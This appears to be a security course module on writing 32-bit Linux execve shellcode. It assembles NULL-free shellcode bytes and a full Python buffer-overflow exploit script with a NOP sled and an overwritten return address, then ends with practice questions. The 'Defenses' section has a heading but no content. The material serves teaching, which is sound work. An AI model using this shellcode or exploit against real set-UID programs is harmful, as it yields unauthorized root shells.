Shellcode

The previous module showed how overwriting a return address redirects execution to existing code — a target() function already in the binary. But real binaries rarely contain a ready-made execve("/bin/sh", …) call. When there is no convenient target to hijack, an attacker injects their own machine code into the process and points the return address at it. That injected payload is called shellcode, because its classic goal is spawning an interactive shell.

Writing shellcode forces you to understand the lowest-level details of how programs communicate with the operating system: the system-call interface.

The Linux system-call interface

User programs cannot directly access hardware resources — they must ask the kernel via system calls. On Linux, the CPU transitions from user mode to kernel mode, executes the requested service, and returns. In assembly you trigger this transition with a single instruction; which instruction depends on the ABI:

ABI                      Trigger instruction   Syscall # register   Arg registers (in order)
x86 32-bit (int $0x80)   int $0x80             %eax                 %ebx, %ecx, %edx, %esi, %edi, %ebp
x86-64 (syscall)         syscall               %rax                 %rdi, %rsi, %rdx, %r10, %r8, %r9

The simplest example: getpid is syscall number 20 (0x14) on 32-bit Linux. To call it:

mov $0x14, %eax   # syscall number for getpid
int $0x80         # enter the kernel

Every syscall has a fixed number you can look up (e.g., at syscalls32.paolostivanin.com). The kernel ignores register contents it does not need for a given call.
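
As a minimal sketch of the calling convention in the table above, the following Python helper maps a syscall number and its arguments onto registers for each ABI. The names ABI_REGS and syscall_registers are hypothetical, introduced only for illustration; the code models the register assignment and never enters the kernel.

```python
# Register conventions from the table above (illustrative helper, not a real API).
ABI_REGS = {
    "i386":   {"trigger": "int $0x80", "number": "eax",
               "args": ["ebx", "ecx", "edx", "esi", "edi", "ebp"]},
    "x86_64": {"trigger": "syscall", "number": "rax",
               "args": ["rdi", "rsi", "rdx", "r10", "r8", "r9"]},
}

def syscall_registers(abi, number, *args):
    """Return the register assignment needed before the trigger instruction."""
    conv = ABI_REGS[abi]
    if len(args) > len(conv["args"]):
        raise ValueError("at most six register arguments are supported")
    regs = {conv["number"]: number}
    # Arguments fill the argument registers strictly in table order.
    regs.update(zip(conv["args"], args))
    return regs

# getpid takes no arguments: only the syscall-number register matters.
print(syscall_registers("i386", 0x14))   # {'eax': 20}
```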

The target syscall: execve

The goal of most shellcode is to call execve, which replaces the current process image with a new program:

int execve(const char *filename, char *const argv[], char *const envp[]);

Called as execve("/bin/sh", {"/bin/sh", NULL}, NULL) it spawns a shell — and if the victim process was Set-UID root, that shell inherits root privileges.

On 32-bit Linux, sys_execve is syscall 0x0b (11). The register mapping is:

Register   Value
%eax       0x0b (syscall number)
%ebx       pointer to the filename string ("/bin/sh")
%ecx       pointer to the argv array ({ptr_to_binsh, NULL})
%edx       pointer to the envp array (NULL — no environment)

Building execve shellcode step by step

The challenge is that shellcode must be position-independent: it has no idea where in memory it will land, so it cannot use hardcoded addresses. The classic solution is to build the "/bin/sh" string and the argv array on the stack at runtime, then read their addresses back from %esp.

Step 1 — Push "/bin/sh" onto the stack

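In 32-bit mode, push moves 4 bytes (one dword) at a time. The string "/bin/sh" is 7 bytes; pad it to 8 by writing "//bin/sh" (the kernel treats the double slash as a single one). Because the stack grows toward lower addresses, push the null terminator first, then the two dwords of the string in reverse order, last dword first: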

xor  %eax, %eax          # zero eax (no NULL bytes in the instruction)
mov  %eax, %edx          # edx = 0  (envp = NULL)
push %eax                # push null terminator for the string
push $0x68732f6e         # "n/sh" (bytes in memory: 6e 2f 73 68)
push $0x69622f2f         # "//bi" (bytes in memory: 2f 2f 62 69)
mov  %esp, %ebx          # ebx --> "//bin/sh\0" on the stack

After these pushes %esp points at the start of "//bin/sh", so mov %esp, %ebx gives us the filename pointer.
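
The two push immediates can be derived mechanically from the string. The sketch below, assuming a string already padded to a multiple of 4 bytes, splits it into dwords and prints them in push order; push_immediates is a hypothetical helper name.

```python
import struct

def push_immediates(path: bytes):
    """Return the 32-bit immediates to push, in push order (last dword first)."""
    if len(path) % 4 != 0:
        raise ValueError("pad the string to a multiple of 4 bytes, e.g. b'//bin/sh'")
    chunks = [path[i:i + 4] for i in range(0, len(path), 4)]
    # "<I" reads 4 bytes as a little-endian unsigned int, which matches how
    # push lays its immediate out in memory.
    return [struct.unpack("<I", c)[0] for c in reversed(chunks)]

for value in push_immediates(b"//bin/sh"):
    print(f"push $0x{value:08x}")
# push $0x68732f6e
# push $0x69622f2f
```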

Step 2 — Build the argv array and set %ecx

execve needs argv = {ptr_to_binsh, NULL}. Push NULL (already in %eax) then push %ebx, then capture %esp:

push %eax                # argv[1] = NULL
push %ebx                # argv[0] = pointer to "//bin/sh"
mov  %esp, %ecx          # ecx --> { ptr_to_binsh, NULL }

Step 3 — Set %eax and invoke

movb $0x0b, %al          # eax = 0x0b (low byte only, avoids NULL bytes)
int  $0x80               # syscall: execve("//bin/sh", argv, NULL)

Complete NULL-free shellcode

xor  %eax, %eax          # eax = 0
mov  %eax, %edx          # edx = 0  (envp)
push %eax                # null terminator
push $0x68732f6e         # "n/sh"
push $0x69622f2f         # "//bi"
mov  %esp, %ebx          # ebx --> filename
push %eax                # argv[1] = NULL
push %ebx                # argv[0] = ptr to filename
mov  %esp, %ecx          # ecx --> argv
movb $0x0b, %al          # eax = 11
int  $0x80               # execve("//bin/sh", argv, NULL)
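
To check the register state just before int $0x80, the instruction sequence can be traced with a toy model of the stack. This is a sketch, not an emulator: STACK_TOP is a hypothetical starting value for %esp, and only the push and mov effects used by this shellcode are modeled.

```python
import struct

STACK_TOP = 0xffffd000          # hypothetical initial %esp, chosen for illustration
mem = {}                        # address -> byte value
regs = {"eax": 0, "ebx": 0, "ecx": 0, "edx": 0, "esp": STACK_TOP}

def push(value):
    """Model a 32-bit push: decrement esp by 4, store the value little-endian."""
    regs["esp"] -= 4
    for i, b in enumerate(struct.pack("<I", value)):
        mem[regs["esp"] + i] = b

def read_dword(addr):
    return struct.unpack("<I", bytes(mem[addr + i] for i in range(4)))[0]

def read_cstring(addr):
    out = bytearray()
    while mem[addr] != 0:
        out.append(mem[addr])
        addr += 1
    return bytes(out)

regs["eax"] = 0                              # xor  %eax, %eax
regs["edx"] = regs["eax"]                    # mov  %eax, %edx
push(regs["eax"])                            # push %eax
push(0x68732f6e)                             # push $0x68732f6e
push(0x69622f2f)                             # push $0x69622f2f
regs["ebx"] = regs["esp"]                    # mov  %esp, %ebx
push(regs["eax"])                            # push %eax
push(regs["ebx"])                            # push %ebx
regs["ecx"] = regs["esp"]                    # mov  %esp, %ecx
regs["eax"] = (regs["eax"] & ~0xff) | 0x0b   # movb $0x0b, %al

print(read_cstring(regs["ebx"]))               # b'//bin/sh'
print(read_dword(regs["ecx"]) == regs["ebx"])  # True: argv[0] points at the string
print(read_dword(regs["ecx"] + 4))             # 0: argv[1] is NULL
```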

The NULL-byte problem — and how to fix it

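String-copying functions like strcpy stop at the first \x00 byte, so a single NULL byte anywhere in the shellcode silently truncates the payload: the rest of the code never reaches the buffer. (gets behaves differently: it stops at a newline, \x0a, rather than at \x00, so the byte to avoid depends on the vulnerable function.)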

The naive version of this shellcode contains several NULL bytes:

b8 0b 00 00 00   mov  $0xb, %eax      ← three NULLs
b9 00 00 00 00   mov  $0x0, %ecx      ← four NULLs
ba 00 00 00 00   mov  $0x0, %edx      ← four NULLs
6a 00            push $0x0            ← one NULL

The fixes applied above:

Naive (contains NULLs)                    NULL-free replacement                 Why it works
mov $0x0, %eax                            xor %eax, %eax                        XOR of a register with itself is always 0; opcode 31 c0 has no zero bytes
push $0x0                                 push %eax (after zeroing)             pushes the already-zeroed register
mov $0x0b, %eax (opcode b8 0b 00 00 00)   movb $0x0b, %al (opcode b0 0b)        writes only the low byte; upper bytes were already zeroed by xor
mov $0x0, %edx                            mov %eax, %edx (after zeroing %eax)   copies zero without embedding a zero byte
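
The effect of the NULL bytes is easy to demonstrate. The sketch below compares the naive encodings listed above with four of the NULL-free replacements; strcpy_copied is a hypothetical stand-in for what a strcpy-style copy would transfer, not a call into libc.

```python
def strcpy_copied(payload: bytes) -> bytes:
    """Bytes a strcpy-style copy would transfer: everything before the first \\x00."""
    return payload.split(b"\x00", 1)[0]

# Naive encodings from the listing above.
naive = bytes.fromhex("b80b000000" "b900000000" "ba00000000" "6a00")
# xor %eax,%eax / mov %eax,%edx / push %eax / movb $0x0b,%al
fixed = bytes.fromhex("31c0" "89c2" "50" "b00b")

for name, code in (("naive", naive), ("fixed", fixed)):
    copied = strcpy_copied(code)
    print(f"{name}: {code.count(0)} NULL bytes, {len(copied)} of {len(code)} bytes copied")
# naive: 12 NULL bytes, 2 of 17 bytes copied
# fixed: 0 NULL bytes, 7 of 7 bytes copied
```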

Assembling and extracting the bytes

Write the shellcode as an assembly file (shellcode.S), assemble it, then extract the raw bytes with objcopy or objdump:

gcc -m32 -nostdlib -static -o shellcode shellcode.S
objdump -d shellcode | grep -Po '\t\K[0-9a-f ]+(?=\t)'

The slides show the assembled bytes for the complete shellcode:

\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68
\x68\x2f\x2f\x62\x69\x89\xe3\x50\x53\x89
\xe1\xb0\x0b\xcd\x80

No byte in this sequence is \x00.
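
Turning the hex columns into an escaped string is a mechanical step. In the sketch below, hex_columns is transcribed by hand from the byte listing above, one entry per instruction; it is not captured from a real objdump run.

```python
# One entry per instruction, in the form objdump -d prints its hex column
# (hand-transcribed from the listing above, an assumption of this sketch).
hex_columns = [
    "31 c0", "89 c2", "50", "68 6e 2f 73 68", "68 2f 2f 62 69",
    "89 e3", "50", "53", "89 e1", "b0 0b", "cd 80",
]

shellcode = bytes.fromhex(" ".join(hex_columns))
escaped = "".join(f"\\x{b:02x}" for b in shellcode)

print(len(shellcode))        # 25
print(b"\x00" in shellcode)  # False
print(escaped)
```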

Delivering the shellcode: the exploit script

With the raw bytes in hand, the exploit script (Python 3) assembles the full payload:

#!/usr/bin/env python3
import sys

shellcode = (
    b"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68"
    b"\x68\x2f\x2f\x62\x69\x89\xe3\x50\x53\x89"
    b"\xe1\xb0\x0b\xcd\x80"
)

content = bytearray(0x90 for _ in range(100))  # NOP sled
start = 16
content[start:start + len(shellcode)] = shellcode

ret    = 0xffffcfd0  # estimated address inside the NOP sled
offset = 76          # bytes from buffer start to saved return address
L = 4                # 4 bytes for 32-bit address
content[offset:offset + L] = ret.to_bytes(L, byteorder='little')

sys.stdout.buffer.write(content)

Key points: the buffer is prefilled with \x90 (NOP, opcode 0x90) rather than 'A', the shellcode is placed at an arbitrary offset inside the sled, and the return address is written at the offset discovered by cyclic/GDB. Because x86 is little-endian, ret.to_bytes(L, byteorder='little') writes the address bytes in the correct order.
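
The layout rules can be turned into checks that fail before the payload is ever sent. The sketch below wraps the same steps as the script above in a hypothetical build_payload function; the bad_bytes parameter is an assumption about the vulnerable copy (b"\x00" for strcpy) and should be adjusted to the actual target.

```python
def build_payload(shellcode: bytes, ret: int, offset: int, start: int,
                  size: int = 100, bad_bytes: bytes = b"\x00") -> bytes:
    """Lay out NOP sled + shellcode + return address and sanity-check the result."""
    if start + len(shellcode) > offset:
        raise ValueError("shellcode would overlap the saved return address")
    if offset + 4 > size:
        raise ValueError("return address does not fit in the payload")
    content = bytearray(b"\x90" * size)
    content[start:start + len(shellcode)] = shellcode
    content[offset:offset + 4] = ret.to_bytes(4, byteorder="little")
    # The address bytes pass through the same copy as the code, so they
    # must avoid the terminator byte as well.
    for b in bad_bytes:
        if b in content:
            raise ValueError(f"payload contains bad byte 0x{b:02x}")
    return bytes(content)

shellcode = (
    b"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68"
    b"\x68\x2f\x2f\x62\x69\x89\xe3\x50\x53\x89"
    b"\xe1\xb0\x0b\xcd\x80"
)
payload = build_payload(shellcode, ret=0xffffcfd0, offset=76, start=16)
print(len(payload), payload[76:80].hex())   # 100 d0cfffff
```

A guessed address such as 0xffff0000 would be rejected here, because its two low-order bytes are \x00 and a strcpy-style copy would stop at them.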

Guessing the address: the NOP sled

Even after finding the buffer-to-return-address offset, you still need to guess where in memory the buffer lives — that is, what value to write as the new return address. Stack addresses vary between runs due to environment differences and ASLR.

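The NOP sled (\x90\x90…) solves this: if the guessed address lands anywhere in the NOPs that precede the shellcode, execution slides harmlessly down them into the shellcode. NOPs placed after the shellcode do not help. A sled of n NOPs before the shellcode widens the set of working return addresses from 1 to n + 1; in the script above, start = 16 gives 17 working addresses, and a longer leading sled tolerates less precise guesses.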
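
The size of the target window can be computed directly. The sketch below assumes the payload is copied verbatim to a buffer at buf_addr with the shellcode at buf_addr + start; the candidate buffer addresses are hypothetical, and landing_window and guess_works are illustrative names.

```python
def landing_window(buf_addr: int, start: int) -> range:
    """Return addresses that reach the shellcode: the leading NOPs plus its first byte."""
    return range(buf_addr, buf_addr + start + 1)

def guess_works(ret: int, buf_addr: int, start: int) -> bool:
    return ret in landing_window(buf_addr, start)

ret, start = 0xffffcfd0, 16          # values from the exploit script
for buf_addr in (0xffffcfc0, 0xffffcfd0, 0xffffcfd4, 0xffffcfb0):
    print(hex(buf_addr), guess_works(ret, buf_addr, start))
# 0xffffcfc0 True
# 0xffffcfd0 True
# 0xffffcfd4 False
# 0xffffcfb0 False
```

With start = 16 the guess tolerates a buffer that sits anywhere from 0 to 16 bytes below ret; moving the shellcode later in the buffer lengthens the leading sled and widens that range.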

Defenses that break this attack

Two mitigations directly target shellcode injection:

Key takeaways

Practice

  1. On 32-bit Linux, which instruction triggers a system call and which register holds the system-call number?
  2. What is the 32-bit Linux syscall number for execve, and which register receives it before int $0x80?
  3. Why does standard execve shellcode push "//bin/sh" (double slash) rather than "/bin/sh"?
  4. Which instruction pair correctly zeroes %eax without introducing any \x00 bytes into the shellcode?
  5. In the NULL-free shellcode, mov $0x0b, %eax is replaced with movb $0x0b, %al. Why does the byte-sized move avoid NULL bytes?
  6. In the NOP-sled technique, what role does the \x90 byte play, and why does it help when the exact shellcode address is unknown?
  7. ASLR (Address Space Layout Randomization) with kernel.randomize_va_space=2 undermines shellcode injection primarily by:
  8. Trace through the complete NULL-free execve shellcode step by step. For each group of instructions, state what register value is set and why it is needed for the int $0x80 syscall.
  9. A student writes the following exploit payload: 100 bytes of 'A', followed by the shellcode bytes, followed by the guessed return address. Explain two reasons this payload is likely to fail, and describe the corrected structure.